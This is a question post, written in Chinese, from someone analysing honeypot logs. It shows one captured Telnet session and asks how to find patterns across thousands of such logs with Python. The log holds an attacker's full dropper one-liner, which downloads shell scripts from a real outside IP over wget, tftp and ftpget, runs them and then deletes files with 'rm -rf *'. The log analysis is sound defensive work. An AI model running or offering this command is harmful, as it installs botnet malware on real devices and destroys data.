logfile - 分析蜜罐的日志文件

Question

[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:08]: New Telnet session established!

[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:42]: rsh
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:46]: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.165.29.25/heckz.sh; chmod 777 heckz.sh; sh heckz.sh; tftp 185.165.29.25 -c get troute1.sh; chmod 777 troute1.sh; sh troute1.sh; tftp -r troute2.sh -g 185.165.29.25; chmod 777 troute2.sh; sh troute2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.165.29.25 troute.sh troute.sh; sh troute.sh; rm -rf heckz.sh troute.sh troute1.sh troute2.sh; rm -rf *
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:46]: >>Executing: /usr/bin/wget
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:47]: >>Executing: /bin/chmod
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:47]: >>Executing: ./ebs
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:47]: >>Executing: Honeypot Provocation Engine
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:47]: >>HP_Exec: /sbin/lsmod
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:47]: >>Executing: /bin/rm
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:47]: >>Executing: /usr/bin/wget
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:48]: >>Executing: /bin/chmod
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:48]: >>Executing: Honeypot Provocation Engine
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:48]: >>HP_Error: -22
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:48]: >>Executing: /bin/rm
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:48]: >>Executing: Honeypot Provocation Engine
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:48]: >>Executing: /usr/bin/wget
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:49]: >>Executing: /bin/chmod
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:49]: >>Executing: Honeypot Provocation Engine
[IPv4:   36.151.15.94:56447 ][Session ID: 2][2017-07-25 17:19:57]: Session end!

我有成千上万个这样的日志文件，我想确定其中的模式，因为所有日志文件中使用的大多数命令都是相同的，请让我知道如何继续或在 python 中使用什么方法？